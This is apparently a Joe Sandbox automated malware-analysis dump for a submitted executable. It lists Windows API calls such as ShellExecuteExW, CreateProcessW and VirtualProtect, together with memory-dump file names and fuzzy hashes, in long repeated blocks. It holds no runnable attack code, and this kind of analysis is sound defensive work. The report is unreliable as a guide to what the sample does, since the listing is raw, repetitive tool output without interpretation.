                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                        • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                        • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                        APIs
                                                        • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0041441E,0040CEF0,0040359E,0040CEF0,0041441E,00414EF0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                        APIs
                                                        • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040361A,00008001,00008001,0040351E,00414EF0,00004000,?,00000000,004033C8), ref: 00406229
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(738B505C,00000004,00000040,738B504C), ref: 738B2A9D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: f73ba5706a754cc74d5ce2f6e60d8307d2dab180f0a5dd0812cdcdaf97b3836d
                                                        • Instruction ID: dda441710ed7ecc23ff0069178790cc0aa0c5d594fded54b71cf7321921cc3e3
                                                        • Opcode Fuzzy Hash: f73ba5706a754cc74d5ce2f6e60d8307d2dab180f0a5dd0812cdcdaf97b3836d
                                                        • Instruction Fuzzy Hash: 1DF0A5F2544A83DEC3A1EF6A94857093BF1BB18304B34472AE19CD6241F3346846CF91
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040659D,?,00421F28,?,?,Call,?,00000000), ref: 00406533
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 572cf4c90763d6db3aff343bf159b9c25ae8d936e0376a9b09b46d4b6c1cb919
                                                        • Instruction ID: 5cf9fff7ca003f7de6e06da3139910a687e7d5fc9395db2f8314fc67efe03c30
                                                        • Opcode Fuzzy Hash: 572cf4c90763d6db3aff343bf159b9c25ae8d936e0376a9b09b46d4b6c1cb919
                                                        • Instruction Fuzzy Hash: BFD05B72B08201D7DB00DBE89B48A9F77609B10368F30853BD111F11D4D6B8C945A71D
                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                        • Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
                                                        • Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                        • Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00405CD7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID:
                                                        • API String ID: 587946157-0
                                                        • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                        • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                        • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                        • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                        APIs
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                          • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                          • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                          • Part of subcall function 00405C85: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                          • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                          • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                          • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                          • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: f60794d5ae17b526ad38acc56fd487baa7bb5126cb0446607b1cbff469675112
                                                        • Instruction ID: 5ec8f1ba08e9840dea923bca67266c83376547b269141edce926560ea608d087
                                                        • Opcode Fuzzy Hash: f60794d5ae17b526ad38acc56fd487baa7bb5126cb0446607b1cbff469675112
                                                        • Instruction Fuzzy Hash: 7AF09C31904615DBEF20BB655AC95DE7665DF00318F11413FE202B21D5CABC4D41A75D
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                        • GetClientRect.USER32(?,?), ref: 00405910
                                                        • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                        • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                          • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                        • ShowWindow.USER32(00000000), ref: 00405A5F
                                                        • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                        • ShowWindow.USER32(00000008), ref: 00405AAE
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                        • CreatePopupMenu.USER32 ref: 00405AF3
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                        • GetWindowRect.USER32(?,?), ref: 00405B27
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                        • OpenClipboard.USER32(00000000), ref: 00405B88
                                                        • EmptyClipboard.USER32 ref: 00405B8E
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                        • CloseClipboard.USER32 ref: 00405BE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: H/B${
                                                        • API String ID: 590372296-332483393
                                                        • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                        • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                        • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                        • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                        • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C79
                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404C85
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                          • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                          • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                          • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                          • Part of subcall function 00406950: CharNextW.USER32(?,"C:\Users\user\Desktop\0GuwV0t2UU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                          • Part of subcall function 00406950: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                        • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D5A
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                          • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                          • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                          • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
